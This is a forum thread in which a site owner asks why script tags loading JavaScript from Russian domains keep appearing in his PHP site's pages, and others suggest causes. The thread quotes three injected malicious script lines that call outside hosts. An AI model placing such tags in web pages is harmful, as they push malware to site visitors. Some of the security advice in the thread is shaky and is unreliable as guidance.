Malware scripts being added to site?

Solarpitch

Hey guys,

Over the past week of so every page on my site has been compromised and a script link has been upload onto the pages. They look like..

<script src=http://www.juc8.ru/js.js></script&gt;
<script src=http://www.nbh3.ru/js.js></script&gt;
<script src=http://www.3njx.ru/js.js></script&gt;

How can these be embedded into the webpage without anyone having FTP access? I have shortened my input textfields and I'm using mysql_string_escape on all queries to the database. Could there be something I'm missing?

aidan_walsh

Moved from Virus and Malware Removal, might get some better responses here.

Solarpitch

Ah yeah, thats grand... wasnt sure where to put it. Cheers

randombar

Are you using any external applications like phpTumb or something like that? Lots of exploits in external apps

also check your file permissions, if this is happening change them to 766 (I think??)

Eoin

I came across the article below last week, which may help.

New SQL Injection Attack Fuses Malware, Phishing

Solarpitch

GaryCocs -
I'll need to check my file permissions again. The only external application I'm using in Moxiecode's TinyMCE .. but you need to be logged into the system before this app can be used.

eoin_s -
I'll have a look at that article now, thanks for the link.

louie

Did you check your database?
The script should be there if you are running asp pages.

Solarpitch

I'm running PHP. The pages that are affected, all of the HTML code is hard coded. I'm only using PHP to run login queries and that, but I cant find anything specific in the database.

When I clean up the files it seems to be fine for a few days, then all of a sudden the scripts are inserted once again.

I read over the article link that eoin provided and that seems to be close to whats happening on my server. Except the scripts are not being stored in the database.

The article said "The attack apparently rewrites the server's Web pages to include JavaScript which pushes malware to the visitor as if it were from the genuine site"... how on earth they can do that is beyond me.

louie

I will start by changing the ftp login details.
Check the server for any files that you dont recognise.
Check the .htaccess file as well...

Solarpitch

Just as a matter of interest, how do you actually view the htaccess log? No too familiar with checking that stuff to be honest.

Is it possible this attack could happen simply if a directory permission was 777? and effect every page on the site.

aidan_walsh

If you have host specific queries, please contact your host for assistance.

mneylon

One of our clients had a similar issue due to PC being infected, so I'd start checking there ...

Solarpitch

I've already fully tested the machine for malware and any sort of infection and cant see any issues.

The site is still getting compromised even if there has been no FTP access from my machine to the server since the last time I cleaned up the files removing the scripts. There must be some loophole on the server among the hundreds of files for this site to be exploited.

I also got the ip address of the domains that were in the scripts and blocked access from them to my server, but there seems to be new domains in circulation all the time.

louie

Yes it does as 777=read, write & execute

using the .htaccess file you can force files into the header.

EKRIUQ

Have you got a stats counter for your website installed , it could be this
I've noticed this script seems to be targeting property rental sites rental sites

http://www.google.ie/search?hl=en&safe=off&q=%3Cscript+src%3Dhttp://www.juc8.ru/js.js%3E%3C/script%3E&start=0&sa=N

src=http://www.juc8.ru/js.js></script&gt; for rent
free hit counter script Some other posts :

It's great to know my virus protection is working:)

Warning don't click any links unless your virus protection is up to date

Solarpitch

No, no hit counter script... just use google analytic's to handle all that. :rolleyes:

I'm gonna search through the server and remove any external/ third party applications that are not in use. See how I get on with that. I have removed all scripts from the site, but no doubt... they'll be back in a few days.

Eoin

Are you using the querystring to send in any values?

Solarpitch

Yes but I have all queries parsed with the mysql_string_escape() and add_slashes();

CapedCrusader

eoin_s wrote: »

I came across the article below last week, which may help.

New SQL Injection Attack Fuses Malware, Phishing

I've seen this attack attempted many times on my site. Is it safe to say that if I don't find references to unfamilliar javascript in the html of my site's pages, then I'm ok?

How can you tell from the DB if this attack has been successful or not?